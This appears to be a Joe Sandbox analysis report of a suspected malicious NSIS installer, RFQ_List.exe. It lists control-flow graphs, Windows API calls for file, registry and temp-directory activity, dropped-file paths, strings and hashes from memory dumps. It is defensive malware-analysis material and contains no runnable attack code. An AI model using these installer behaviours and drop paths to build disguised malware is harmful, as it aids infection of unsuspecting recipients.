                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                  • String ID: "C:\Users\user\Desktop\RFQ_List.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Space required: $_Nb
                  • API String ID: 606308-2351675733
                  • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                  • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                  • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                  • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 439 403020-403024 437->439 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 459 402eab-402eb2 451->459 460 402fcd-402fd5 call 402d8a 451->460 455 402f78-402f90 call 403258 call 403242 452->455 456 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->456 453->439 455->453 482 402f92-402f98 455->482 456->453 480 402fd7-402fe8 456->480 464 402eb4-402ec8 call 405be5 459->464 465 402f2e-402f32 459->465 460->453 471 402f3c-402f42 464->471 479 402eca-402ed1 464->479 470 402f34-402f3b call 402d8a 465->470 465->471 470->471 476 402f51-402f5b 471->476 477 402f44-402f4e call 4064dc 471->477 476->448 481 402f61 476->481 477->476 479->471 486 402ed3-402eda 479->486 487 402ff0-402ff5 480->487 488 402fea 480->488 481->445 482->453 482->456 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 493 402eee-402f0e 491->493 496 40301e 492->496 493->453 495 402f14-402f18 493->495 497 402f20-402f28 495->497 498 402f1a-402f1e 495->498 496->439 497->471 499 402f2a-402f2c 497->499 498->481 498->497 499->471
                  APIs
                  • GetTickCount.KERNEL32 ref: 00402DFF
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ_List.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                    • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ_List.exe,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                  • String ID: "C:\Users\user\Desktop\RFQ_List.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ_List.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                  • API String ID: 4283519449-4275170819
                  • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                  • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                  • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                  • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 626 401767-40178c call 402bbf call 405a80 631 401796-4017a8 call 406055 call 405a09 lstrcatW 626->631 632 40178e-401794 call 406055 626->632 637 4017ad-4017ae call 4062e9 631->637 632->637 641 4017b3-4017b7 637->641 642 4017b9-4017c3 call 406398 641->642 643 4017ea-4017ed 641->643 651 4017d5-4017e7 642->651 652 4017c5-4017d3 CompareFileTime 642->652 644 4017f5-401811 call 405c2a 643->644 645 4017ef-4017f0 call 405c05 643->645 653 401813-401816 644->653 654 401885-4018ae call 4051b4 call 403027 644->654 645->644 651->643 652->651 655 401867-401871 call 4051b4 653->655 656 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 653->656 668 4018b0-4018b4 654->668 669 4018b6-4018c2 SetFileTime 654->669 666 40187a-401880 655->666 656->641 688 40185c-40185d 656->688 671 402a55 666->671 668->669 670 4018c8-4018d3 CloseHandle 668->670 669->670 673 4018d9-4018dc 670->673 674 402a4c-402a4f 670->674 675 402a57-402a5b 671->675 677 4018f1-4018f4 call 406077 673->677 678 4018de-4018ef call 406077 lstrcatW 673->678 674->671 684 4018f9-40228d call 40579a 677->684 678->684 684->674 684->675 688->666 690 40185f-401860 688->690 690->655
                  APIs
                  • lstrcatW.KERNEL32(00000000,00000000,C:\Windows\Fonts\sipunculid.gra,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes,?,?,00000031), ref: 004017A8
                  • CompareFileTime.KERNEL32(-00000014,?,C:\Windows\Fonts\sipunculid.gra,C:\Windows\Fonts\sipunculid.gra,00000000,00000000,C:\Windows\Fonts\sipunculid.gra,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes,?,?,00000031), ref: 004017CD
                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                  • String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes$C:\Windows\Fonts\sipunculid.gra$C:\Windows\resources\0809\gildes.lak$Copy to C:\Users\Public\Desktop\Bardehvalers.unw
                  • API String ID: 1941528284-4085930999
                  • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                  • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                  • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                  • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-403050 692->694 693->694 695 403052 694->695 696 403059-40305e 694->696 695->696 697 403060-403069 call 403258 696->697 698 40306e-40307b call 403242 696->698 697->698 702 403230 698->702 703 403081-403085 698->703 704 403232-403233 702->704 705 4031db-4031dd 703->705 706 40308b-4030d4 GetTickCount 703->706 709 40323b-40323f 704->709 707 40321d-403220 705->707 708 4031df-4031e2 705->708 710 403238 706->710 711 4030da-4030e2 706->711 712 403222 707->712 713 403225-40322e call 403242 707->713 708->710 714 4031e4 708->714 710->709 715 4030e4 711->715 716 4030e7-4030f5 call 403242 711->716 712->713 713->702 724 403235 713->724 718 4031e7-4031ed 714->718 715->716 716->702 726 4030fb-403104 716->726 721 4031f1-4031ff call 403242 718->721 722 4031ef 718->722 721->702 729 403201-40320d call 405cdc 721->729 722->721 724->710 728 40310a-40312a call 40654a 726->728 733 403130-403143 GetTickCount 728->733 734 4031d3-4031d5 728->734 738 4031d7-4031d9 729->738 739 40320f-403219 729->739 736 403145-40314d 733->736 737 40318e-403190 733->737 734->704 741 403155-40318b MulDiv wsprintfW call 4051b4 736->741 742 40314f-403153 736->742 743 403192-403196 737->743 744 4031c7-4031cb 737->744 738->704 739->718 740 40321b 739->740 740->710 741->737 742->737 742->741 747 403198-40319f call 405cdc 743->747 748 4031ad-4031b8 743->748 744->711 745 4031d1 744->745 745->710 752 4031a4-4031a6 747->752 751 4031bb-4031bf 748->751 751->728 753 4031c5 751->753 752->738 754 4031a8-4031ab 752->754 753->710 754->751
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CountTick$wsprintf
                  • String ID: jA$ jA$... %d%%
                  • API String ID: 551687249-2167919867
                  • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                  • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                  • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                  • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 755 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 762 4023c7-4023cf 755->762 763 402a4c-402a5b 755->763 764 4023d1-4023de call 402bbf lstrlenW 762->764 765 4023e2-4023e5 762->765 764->765 768 4023f5-4023f8 765->768 769 4023e7-4023f4 call 402ba2 765->769 773 402409-40241d RegSetValueExW 768->773 774 4023fa-402404 call 403027 768->774 769->768 776 402422-4024fc RegCloseKey 773->776 777 40241f 773->777 774->773 776->763 777->776
                  APIs
                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                  • lstrlenW.KERNEL32(Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                  • RegSetValueExW.KERNELBASE(?,?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                  • RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CloseCreateValuelstrlen
                  • String ID: Copy to C:\Users\Public\Desktop\Bardehvalers.unw
                  • API String ID: 1356686001-2199123339
                  • Opcode ID: 8d1fa541b4be6473b4eebec5251f87ec0d75fe525894c7cf72dd691243c30abf
                  • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                  • Opcode Fuzzy Hash: 8d1fa541b4be6473b4eebec5251f87ec0d75fe525894c7cf72dd691243c30abf
                  • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 780 405683-4056ce CreateDirectoryW 781 4056d0-4056d2 780->781 782 4056d4-4056e1 GetLastError 780->782 783 4056fb-4056fd 781->783 782->783 784 4056e3-4056f7 SetFileSecurityW 782->784 784->781 785 4056f9 GetLastError 784->785 785->783
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                  • GetLastError.KERNEL32 ref: 004056DA
                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                  • GetLastError.KERNEL32 ref: 004056F9
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 3449924974-3081826266
                  • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                  • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                  • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                  • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 786 402bff-402c28 RegOpenKeyExW 787 402c93-402c97 786->787 788 402c2a-402c35 786->788 789 402c50-402c60 RegEnumKeyW 788->789 790 402c62-402c74 RegCloseKey call 40642b 789->790 791 402c37-402c3a 789->791 799 402c76-402c85 790->799 800 402c9a-402ca0 790->800 792 402c87-402c8a RegCloseKey 791->792 793 402c3c-402c4e call 402bff 791->793 795 402c90-402c92 792->795 793->789 793->790 795->787 799->787 800->795 801 402ca2-402cb0 RegDeleteKeyW 800->801 801->795 803 402cb2 801->803 803->787
                  APIs
                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Close$DeleteEnumOpen
                  • String ID:
                  • API String ID: 1912718029-0
                  • Opcode ID: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
                  • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                  • Opcode Fuzzy Hash: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
                  • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 804 401bdf-401bf7 call 402ba2 * 2 809 401c03-401c07 804->809 810 401bf9-401c00 call 402bbf 804->810 812 401c13-401c19 809->812 813 401c09-401c10 call 402bbf 809->813 810->809 816 401c1b-401c2f call 402ba2 * 2 812->816 817 401c5f-401c89 call 402bbf * 2 FindWindowExW 812->817 813->812 828 401c31-401c4d SendMessageTimeoutW 816->828 829 401c4f-401c5d SendMessageW 816->829 827 401c8f 817->827 830 401c92-401c95 827->830 828->830 829->827 831 401c9b 830->831 832 402a4c-402a5b 830->832 831->832
                  APIs
                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$Timeout
                  • String ID: !
                  • API String ID: 1777923405-2657877971
                  • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                  • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                  • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                  • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 835 405f22-405f54 RegOpenKeyExW 836 405f96-405f99 835->836 837 405f56-405f75 RegQueryValueExW 835->837 838 405f83 837->838 839 405f77-405f7b 837->839 840 405f86-405f90 RegCloseKey 838->840 839->840 841 405f7d-405f81 839->841 840->836 841->838 841->840
                  APIs
                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Space required: ,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F4C
                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F6D
                  • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F90
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: Space required:
                  • API String ID: 3677997916-1411000802
                  • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                  • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                  • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                  • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 842 405c59-405c65 843 405c66-405c9a GetTickCount GetTempFileNameW 842->843 844 405ca9-405cab 843->844 845 405c9c-405c9e 843->845 847 405ca3-405ca6 844->847 845->843 846 405ca0 845->846 846->847
                  APIs
                  • GetTickCount.KERNEL32 ref: 00405C77
                  • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CountFileNameTempTick
                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                  • API String ID: 1716503409-678247507
